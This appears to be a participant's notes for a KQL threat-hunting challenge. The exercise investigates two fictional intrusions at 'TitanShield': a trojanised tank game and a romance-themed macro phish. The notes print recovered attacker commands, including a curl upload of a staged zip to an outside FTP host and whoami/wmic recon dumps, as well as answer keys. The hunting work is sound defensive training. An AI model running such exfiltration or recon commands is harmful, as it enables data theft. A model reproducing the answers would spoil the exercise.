//title: Titan Shield
////Section 1: All Fun and Games

//What was the name of the game that James mentioned in his LinkedIn post? De Tank War
Employees
| where name contains "james Douglas"
//name== James Douglas; Ip-addr==10.10.0.10; Email, james_douglas@titanshield.com; username: jadouglas
//role; Lead Defense Engineer hostname; UB9I-DESKTOP company domain: titanshield.com
//name of the game == De Tank War

//How many results did this query return?
FileCreationEvents
| where hostname == "UB9I-DESKTOP"
| where filename has "DeTankWar"
//| count //1
//What is the SHA256 hash of this file?
// filename=DeTankWar.exe ; sha256== 56554117d96d12bd3504ebef2a8f28e790dd1fe583c33ad58ccbf614313ead8c

//What is the score assigned to this file? Score== 100
//Which threat actor is this file attributed to? Moonstone sleet

//Section 2: It's Giving Sleet

//Under the Articles section of the Defender XDR report for this file, there is one article listed. What is the title of that article?
//Moonstone Sleet using malicious tank game to infect devices
//Which country is Moonstone Sleet based out of? north korea
//Moonstone Sleet targets individuals and organizations within the software development, information technology, education, and defense industrial base
//Moonstone Sleet's attacks are focused on the goals of espionage and revenue generation.
//Moonstone Sleet has demonstrated a significant overlap with which other North Korean threat actor? Diamond Sleet

//According to the article, when did this campaign begin?Feb 2024
//According to the article, the initial access vectors used in this campaign include messaging platforms and .
//Email
//What is the domain name included in that email?detankwar.com

Email
| where link has "detankwar.com" //6

//How many distinct TitanShield employees were targeted?
Email
| where link has "DeTankWar"
| distinct recipient //6; ethan_johnson@titanshield.com; amir_ali@titanshield.com; ryan_patel@titanshield.com; james_douglas@titanshield.com; lucas_nguyen@titanshield.com
//henry_kim@titanshield.com

//Which role did most of the employees have? Defense Engineer
Email
| where link has "DeTankWar"
| distinct recipient
| join kind=inner Employees on $left.recipient==$right.email_addr
| distinct email_addr, name, role

//Section 3: Perfectly Executed

// How many results did this query return? 6
FileCreationEvents
| where filename in~ ("nvunityplugin.dll","unityplayer.dll") //C:\Users\amali\Downloads\DeTankWar_Data\UnityPlayer.dll; UnityPlayer.dll
//sha256; 09d152aa2b6261e3b0a1d1c19fa8032f215932186829cfcca954cc5e84a6cc38; 

//This hash is attributed in the Microsoft Defender XDR portal to which threat actor?
//This indicator was mentioned in a report.
//🔎 Title: //Moonstone Sleet// emerges as new North Korean threat actor with new bag of tricks
//📑 Reference: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
//📆 Report Publish Date: 2024-05-28
//📤 Sample Upload Date: 2024-02-29
//🏷️ Reference ID: #40a67243b (https://www.virustotal.com/gui/search/40a67243b/comments for report's related indicators)

//What is the full process_commandline executed using this domain?/// 
ProcessEvents
| where process_commandline has "curl" and process_commandline  has_any ("mingeloem.com","matrixane.com")

//curl -T C:\ReadyToGo\TopSecret.zip ftp://matrixane.com/upload/ --user exfil:tankpass

//What is the -Path argument provided to Compress-Archive? C:\StagingArea\* (Compress-Archive -Path C:\StagingArea\* -DestinationPath C:\ReadyToGo\TopSecret.zip)
ProcessEvents
| where process_commandline has "TopSecret.zip"

//What is the -Path argument provided to Copy-Item? \\company_share\confidential\defense\project_omega\*
ProcessEvents
| where process_commandline has "StagingArea"

//Section 4: A Love Story ❤️

//What is chtaylor's hostname?
Employees
| where username == "chtaylor"
//name== Christopher Taylor; ip_addr==10.10.0.79; christopher_taylor@titanshield.com; Role== Network Engineer
//hostname== IL5M-DESKTOP

//When was this process executed on Taylor's machine? (Copy and paste the exact time.)
ProcessEvents
| where hostname == "IL5M-DESKTOP"
| where process_commandline has "whoami" //2024-07-20T03:58:19.000Z
//cmd.exe /c echo PC and User Names -------- >>%temp%\Logs.txt && whoami >>%temp%\Logs.txt

//How many similar processes do we find on Taylor's machine? 39
ProcessEvents
| where hostname == "IL5M-DESKTOP"
| where process_commandline has_all("echo", ">>", "logs.txt")

//What is the path, including the filename, where these commands are being dumped? >>%temp%\Logs.txt

//Which domain is this? yandex.com
ProcessEvents
| where hostname == "IL5M-DESKTOP"
| where process_commandline has_all("echo", ">>", "logs.txt","Ping")

//the actor is using wmic to get software info from the machine
//What command do they execute? (not the full command line, just the relevant wmic part)
ProcessEvents
| where hostname == "IL5M-DESKTOP"
| where process_commandline has_all("echo", ">>", "logs.txt","wmic") //wmic product get name,version

//What is Taylor's job role?

Employees
| where username == "chtaylor"
| project role  //Network Engineer

//Let's see if anyone else is doing this kind of thing.
//We'll just broaden our previous query to see if anyone else used the commands that dumped info to logs.txt.
//How many total hits do we get?
ProcessEvents
| where process_commandline has_all("echo", ">>", "logs.txt") //663

//On how many distinct hostnames do we see these commands running? 15
ProcessEvents
| where process_commandline has_all("echo", ">>", "logs.txt")
| distinct hostname

//What is the most prevalent job role for these employees?Network Engineer
ProcessEvents
| where process_commandline has_all("echo", ">>", "logs.txt")
| distinct hostname
| lookup Employees on hostname
| project hostname, role
| summarize count() by role //14 x Network Engineer;  1x Senior Network Engineer

//What other job role do we see? Senior Network Engineer

//What was the earliest time we saw one of these suspicious commands getting run on Taylor's computer?
ProcessEvents
| where hostname == "IL5M-DESKTOP"
| where process_commandline has_all("echo", ">>", "logs.txt")
| summarize earliest = min(timestamp) //2024-07-17T10:47:43.000Z

//Right before that, we saw a suspicious macro getting run on the same machine.
//What was that full command?
ProcessEvents
| where hostname == "IL5M-DESKTOP"
| where process_commandline contains ".xlsm" or process_commandline contains ".docm"
| where timestamp <= datetime(2024-07-17 10:47:43)
| project  timestamp, process_commandline //C:\temp\macro.xlsm; 2024-07-17T10:11:43.000Z

//Right before the macro command, we see an xlsx file getting executed on Taylor's machine.
//What was the name of that file?
FileCreationEvents
| where hostname == "IL5M-DESKTOP"
| where filename contains ".xlsx"
| where timestamp <= datetime(2024-07-17 10:11:43)
| project  timestamp, filename //New_Diet_Plan_For_My_Love.xlsx; 2024-07-17T10:10:51.000Z

//What is the sha256 hash of the file?
FileCreationEvents
| where hostname == "IL5M-DESKTOP"
| where filename contains "New_Diet_Plan_For_My_Love.xlsx" //6aeef036eb85a470dbd6d039250172a510a8627b873e8b3b79fae5a7dd767e73

//What is the process data associated with the creation of that file?

//Edge.exe

//Oh so the file must have been downloaded from the Internet.
//Let's try to figure out where the user got the file from.
//OutboundBrowsing events give us a record of websites browsed by people inside the company. Maybe we can find out which website was browsed to download the file.
//Which column are we most likely to find our filename in?
OutboundNetworkEvents
| take 10 //url

//To hone our query, we'll also 
Employees
| where username == "chtaylor" //ip_addr== 10.10.0.79

//What URL did Taylor download this file from?
OutboundNetworkEvents
| where src_ip == "10.10.0.79"
| where url has "New_Diet_Plan_For_My_Love.xlsx"//https://healthylifestyle.com/share/New_Diet_Plan_For_My_Love.xlsx

//Section 5: A Heartbreak 💔

//You look through the logs, and it doesnt seem like Taylor went out of his way to search and download this file. Maybe he just clicked a link in an email.
//Let's look for this URL to see if it was delivered in any emails.
//We do see an email!
//Who sent the email? marcella_flores@gmail.com
Email
| where link has "https://healthylifestyle.com/share/New_Diet_Plan_For_My_Love.xlsx"
//subject: [EXTERNAL] RE: Relax with these yoga poses, baby! 🧘‍♂️

//How many emails did marcella_flores@gmail.com send?
Email
| where sender contains "marcella_flores@gmail.com" //13

//Let's take those emails and see what else we can discover about what the actor did in our company.
//How many total domains were in the links seen in that email?
Email
| where sender == "marcella_flores@gmail.com"
| extend domain = parse_url(link).Host
| distinct tostring(domain) 

//3, outlook-services.com, yogalifestyle.com, healthylifestyle.com

// Which threat actor is one of these domains linked to?

//outlook-services.com

//https://www.virustotal.com/gui/domain/outlook-services.com

// Crimson Sandstorm

//Look in PassiveDNS. How many IPs did these domains resolve to?

PassiveDns
| where domain in ("outlook-services.com","yogalifestyle.com", "healthylifestyle.com")
| distinct ip //2  208.199.30.154 ; 202.241.233.180

//One thing the actor might have done before the attack is reconnaissance, which is where a threat actor researches information about a potential target.
//If the actor conducted reconnaisance against our company, which table would we find that activity in? //InboundNetworkEvents
InboundNetworkEvents
| where src_ip in ("208.199.30.154", "202.241.233.180") //47
| summarize earliest = min(timestamp) //2024-07-05T00:00:00.000Z

//Which social media platform were they using to conduct this recon?
InboundNetworkEvents
| where src_ip in ("208.199.30.154", "202.241.233.180")
| where referrer contains "link" or referrer contains "X" or referrer contains "GitHub"
//https://www.linkedin.com

//Which employee did the threat actor exfiltrate data from?

search*
|distinct $table

Email
| where subject contains "exfil"
//david jackson

//What address did the actor send the exfiltrated data to? exfilbucket93@gmail.com

Employees
| where name contains "david jackson" //10.10.0.8

//When (enter full timestamp) did David Jackson make a google search about EDR alerts?

OutboundNetworkEvents
| where src_ip contains "10.10.0.8"
| where url contains "google" and  url contains "EDR" //2024-08-03T07:09:23.000Z

//On which days of the week does David's girlfriend not talk to him? (Enter your answer in order of the days, separated by a comma - example: Sunday,Funday)
Email
| where recipient contains "david_jackson@titanshield.com"
| where sender !contains "@titanshield.com"
//Thursday,Friday

//How many total Google searches did David make?
OutboundNetworkEvents
| where src_ip contains "10.10.0.8"
| where url contains "google" and url contains "search" //6

//Congratulations!
//You successfully uncovered two sophisticated attacks targeting TitanShield's most sensitive projects. First, you discovered the download of a malicious game via a phishing email, which led to the exfiltration of data related to Project Omega. This attack was orchestrated by the notorious Moonstone Sleet. The other attack involved a romance scheme, leading to the exfiltration of critical details and information about the system, network, and users, attributed to Crimson Sandstorm.
//Both attacks shared a common theme: sophisticated social engineering tactics leading to malicious file execution, data exfiltration, and severe potential threats to TitanShield's security and intellectual property. Your keen investigative skills revealed the extent of these attacks, the threat actors involved, and their malicious tactics.
//In both attacks, social media was used by the threat actors to perform reconnaissance on their victims. So be careful what you post and who you connect with!